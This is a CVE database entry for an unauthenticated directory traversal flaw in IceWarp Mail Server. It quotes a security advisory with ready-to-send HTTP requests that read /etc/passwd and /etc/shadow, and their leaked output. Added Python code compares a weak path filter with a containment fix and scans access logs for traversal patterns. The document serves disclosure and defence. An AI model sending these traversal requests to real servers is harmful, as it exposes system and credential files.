CVE-2015-1503
CVSS 7.8
Published: 2018-05-08 16:29:00
Revised: 2018-06-12 14:03:31
NMP    

[Original] Multiple directory traversal vulnerabilities in IceWarp Mail Server before 11.2 allow remote attackers to read arbitrary files via a (1) .. (dot dot) in the file parameter to a webmail/client/skins/default/css/css.php page or .../. (dot dot dot slash dot) in the (2) script or (3) style parameter to webmail/old/calendar/minimizer/index.php.


[CNNVD] No CNNVD data available.



- CVSS (base score)

CVSS score: 7.8 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all files on the system are exposed]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [no special conditions are needed to exploit the vulnerability]
Access vector: NETWORK [the attacker needs neither local nor internal-network access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-22 [Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)]

- CPE (affected platforms and products)

cpe:/a:icewarp:mail_server:9.3.1
cpe:/a:icewarp:mail_server:9.3.2
cpe:/a:icewarp:mail_server:9.4.0
cpe:/a:icewarp:mail_server:9.4.1
cpe:/a:icewarp:mail_server:9.4.2
cpe:/a:icewarp:mail_server:10.0.3
cpe:/a:icewarp:mail_server:10.0.4
cpe:/a:icewarp:mail_server:10.0.5
cpe:/a:icewarp:mail_server:10.0.6
cpe:/a:icewarp:mail_server:10.0.7
cpe:/a:icewarp:mail_server:10.0.8
cpe:/a:icewarp:mail_server:10.1.0
cpe:/a:icewarp:mail_server:10.1.1
cpe:/a:icewarp:mail_server:10.1.2
cpe:/a:icewarp:mail_server:10.1.3
cpe:/a:icewarp:mail_server:10.1.4
cpe:/a:icewarp:mail_server:10.2.0
cpe:/a:icewarp:mail_server:10.2.1
cpe:/a:icewarp:mail_server:10.2.2
cpe:/a:icewarp:mail_server:10.3.0
cpe:/a:icewarp:mail_server:10.3.1
cpe:/a:icewarp:mail_server:10.3.2
cpe:/a:icewarp:mail_server:10.3.3
cpe:/a:icewarp:mail_server:10.3.4
cpe:/a:icewarp:mail_server:10.3.5
cpe:/a:icewarp:mail_server:10.4.0
cpe:/a:icewarp:mail_server:10.4.1
cpe:/a:icewarp:mail_server:10.4.2
cpe:/a:icewarp:mail_server:10.4.3
cpe:/a:icewarp:mail_server:10.4.4
cpe:/a:icewarp:mail_server:10.4.5
cpe:/a:icewarp:mail_server:11.0.0
cpe:/a:icewarp:mail_server:11.0.1
cpe:/a:icewarp:mail_server:11.1.0
cpe:/a:icewarp:mail_server:11.1.1
cpe:/a:icewarp:mail_server:11.1.2

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1503
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1503
(official data source) NVD

- Other links and resources

http://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
(VENDOR_ADVISORY)  MISC
https://www.exploit-db.com/exploits/44587/
(VENDOR_ADVISORY)  EXPLOIT-DB  44587
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614
(VENDOR_ADVISORY)  MISC

- Vulnerability information (F147505)

IceWarp Mail Server Directory Traversal (PacketStormID:F147505)
2018-05-04 00:00:00
Piotr Karolak  trustwave.com
exploit,file inclusion
CVE-2015-1503

IceWarp Mail Server versions 11.1.1 and below suffer from multiple unauthenticated directory traversal vulnerabilities.

Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 11.1.1 and below
 
Product description: 
IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.
 
Finding 1: Multiple Unauthenticated Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs
CVE: CVE-2015-1503
CWE: CWE-22
 
#Proof of Concept
 
The unauthenticated directory traversal can be exploited by issuing a
specially crafted HTTP GET request to
/webmail/client/skins/default/css/css.php. Directory traversal is a
vulnerability that lets an attacker reach files outside the directory the
application is meant to serve from, here the web server's document root.
 
The affected URL is
/-.._._.--.._1416610368/webmail/client/skins/default/css/css.php. The
leading path component varies per installation; read it from the page
source of the web client rather than copying the value shown here.
 
Attack details
The GET parameter file was set to ../../../../../../../../../../etc/passwd
 
Proof-of-Concept:
 
The request (GET or POST both work) is sent to the host a.b.c.d where the IceWarp mail server is running:
 
REQUEST
=======
GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
 
 
RESPONSE:
=========
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
 
....TRUNCATED
 
test:x:1000:1000:test,,,:/home/test:/bin/bash 
smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false 
smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false 
mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false 
 
The above proof-of-concept would retrieve the /etc/passwd file (the
response in this example has been truncated).
 
#Proof of Concept
 
The unauthenticated directory traversal can be exploited by submitting the
payload
..././..././..././..././..././..././..././..././..././..././etc/shadow
in the script and/or style parameter of an HTTP GET or POST request. Note
the .../. sequence (URL-encoded as ...%2f.%2f in the requests below) rather
than the plain ../ used against css.php. Directory traversal is a
vulnerability that lets an attacker read files outside the web server's
root directory.
 
The script and style parameters are vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.
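The two payload shapes in this advisory (plain ../ against css.php, .../. against the minimizer) are worth seeing side by side in code. The following is an added example, not code from the advisory or from IceWarp: it models a hypothetical input filter that strips "../" in a single pass. Such a filter stops the plain payload but is defeated by the .../. form, because removing the middle "../" from "..././" leaves "../" behind. Next to it is a containment check that normalizes the resolved path and requires it to stay under the web root, which refuses the traversal in both encodings. WEBROOT is an assumed installation path, and the advisory does not state what filtering, if any, IceWarp actually performed.

```python
import posixpath
from urllib.parse import unquote

# Assumed web root for the skin CSS directory; a real deployment differs.
WEBROOT = "/opt/icewarp/html/webmail/client/skins/default/css"

# The two payload shapes from the advisory, as query-string values on the wire.
PAYLOAD_DOTDOT = "../../../../../../../../../../etc/passwd"
PAYLOAD_DOTDOTDOT = (
    "...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f"
    "...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow"
)


def strip_dotdot_slash_once(path: str) -> str:
    """Hypothetical weak sanitizer: a single pass of str.replace on the decoded value.

    '..././' becomes '../' because the inner '../' is removed and the remaining
    '.' and './' join up; nothing re-checks the result.
    """
    return path.replace("../", "")


def resolve_under_webroot(value: str, sanitizer=lambda p: p) -> str:
    """Model a PHP-style file include: decode once, optionally sanitize, join, normalize.

    posixpath keeps this offline; a real server would open the file at this point.
    """
    decoded = unquote(value)
    return posixpath.normpath(posixpath.join(WEBROOT, sanitizer(decoded)))


def safe_resolve(value: str):
    """Containment check: the normalized target must remain under WEBROOT.

    Returns the resolved path, or None when the request must be refused.
    On a live filesystem, resolve symlinks with os.path.realpath before comparing.
    """
    decoded = unquote(value)
    if "\x00" in decoded or "\\" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(WEBROOT, decoded))
    if posixpath.commonpath([WEBROOT, candidate]) != WEBROOT:
        return None
    return candidate


if __name__ == "__main__":
    print("no filter,  '..' payload    ->", resolve_under_webroot(PAYLOAD_DOTDOT))
    print("strip-once, '..' payload    ->", resolve_under_webroot(PAYLOAD_DOTDOT, strip_dotdot_slash_once))
    print("strip-once, '.../.' payload ->", resolve_under_webroot(PAYLOAD_DOTDOTDOT, strip_dotdot_slash_once))
    print("contained,  '..' payload    ->", safe_resolve(PAYLOAD_DOTDOT))
    print("contained,  '.../.' payload ->", safe_resolve(PAYLOAD_DOTDOTDOT))
```

The strip-once filter turns the ten .../. units into ten ../ units and resolves to /etc/shadow, while the same filter keeps the plain payload inside the web root. The containment check does not try to recognise bad patterns at all; it resolves first and then checks where the path landed, so the .../. form simply becomes a nonexistent subdirectory under WEBROOT.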
 
REQUEST 1
=========
 
GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
 
REQUEST 2
=========
 
GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en
 
RESPONSE
========
HTTP/1.1 200 OK
Connection: close
Server: IceWarp/11.1.1.0
Date: Thu, 03 Jan 2015 06:44:23 GMT
Content-type: text/javascript; charset=utf-8
 
root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
games:*:16273:0:99999:7:::
man:*:16273:0:99999:7:::
lp:*:16273:0:99999:7:::
 
....TRUNCATED
 
lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::
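For the defender's side, an added example that is not part of the advisory: a scanner for web server access logs that flags both request shapes shown above. It percent-decodes each query value until the value stops changing (so the %2f form and a double-encoded %252e form both normalize), splits on slashes, and flags any path component that consists only of dots, so "..", "..." and longer runs all match. The log lines are constructed for this example in combined log format; the first two mirror the advisory's requests, the third is a double-encoded variant, and the last two are benign. A plain substring match on ".." would be noisier here: the per-installation prefix /-.._._.--.._1416610368/ seen in the first PoC contains ".." in every legitimate request, and this scanner does not flag it.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (combined format). Not captured from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jan/2015:06:44:23 +0000] "GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1" 200 1842
203.0.113.5 - - [03/Jan/2015:06:44:25 +0000] "GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1" 200 1180
203.0.113.5 - - [03/Jan/2015:06:44:27 +0000] "GET /webmail/old/calendar/minimizer/index.php?style=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 0
198.51.100.7 - - [03/Jan/2015:06:45:01 +0000] "GET /webmail/client/skins/default/css/css.php?file=default.css&palette=default&skin=default HTTP/1.1" 200 5120
198.51.100.7 - - [03/Jan/2015:06:45:02 +0000] "GET /webmail/old/calendar/minimizer/index.php?script=./calendar.js HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A path component made only of two or more dots: '..', '...', '....', and so on.
DOT_RUN = re.compile(r"^\.{2,}$")


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %252e%252e (double-encoded) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_components(value: str) -> list:
    """Return the dot-run components of a path-like value after decoding."""
    normalized = decode_fully(value).replace("\\", "/")
    return [c for c in normalized.split("/") if DOT_RUN.match(c)]


def suspicious_params(url: str) -> list:
    """Check the URL path and every query value; return (name, components) per hit."""
    parts = urlsplit(url)
    hits = []
    comps = traversal_components(parts.path)
    if comps:
        hits.append(("<path>", comps))
    # parse_qsl already decodes one layer; decode_fully handles any further layers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        comps = traversal_components(value)
        if comps:
            hits.append((name, comps))
    return hits


def scan_log(text: str) -> list:
    """Parse each log line and emit one finding per offending parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, comps in suspicious_params(m["url"]):
            findings.append({"ip": m["ip"], "ts": m["ts"], "param": param,
                             "components": comps, "url": m["url"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['ts']} param={f['param']} dot_runs={len(f['components'])}")
```

Run against the constructed lines, the scanner reports three findings, all from 203.0.113.5: the file parameter with ten ".." components, the script parameter with five "..." components, and the double-encoded style parameter with one ".." component. The two benign requests, including the one whose path carries the dotted installation prefix, produce nothing.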


    
 

 
